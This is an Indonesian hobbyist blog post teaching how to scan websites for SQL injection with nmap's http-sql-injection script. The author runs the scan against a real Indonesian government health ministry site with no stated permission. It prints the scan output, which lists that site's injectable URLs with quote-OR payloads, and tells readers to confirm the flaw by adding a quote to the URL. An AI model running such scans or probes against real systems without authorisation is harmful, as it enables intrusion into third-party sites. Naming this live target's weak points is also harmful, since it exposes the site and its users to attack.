xixihi , malam fans .-. Nuenomaru disini.
Sesuai judulnya, kali ini gua bakal share Tutorial Scan vuln SQL Injection menggunakan NMAP di Linux , di tutorial ini Nue bakal praktekin di Kali Linux di leppy nue, silahkan di coba di Linux2 kesayangan anda.
lanjut tutorialnya
ketikan:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan
disini saya akan test situs http://www.depkes.go.id
ketikan:
nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection:
| Possible sqli for queries:
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
| http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
| http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_ http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds
nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :
http://www.depkes.go.id/index.php?lg=LN01
tambahkan kutip pada akhir alamat url, dan ini hasil nya.
ini saya buat video nya juga cekidoot
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
Salam para penjinak pinguin :v , Penunggang Naga, Viva Real Tux Warrior Gaes :'v wkkwkwkw
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih
Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Sekolah Gengs.. akawkwa
Bye..
source and thanks to: Forum BackBox Indonesia
./Nuenomaru
 |
| Topi kebelakang, Mata ku jauh Menatap KeDepan ;) |
Visit and follow :
0 komentar:
Posting Komentar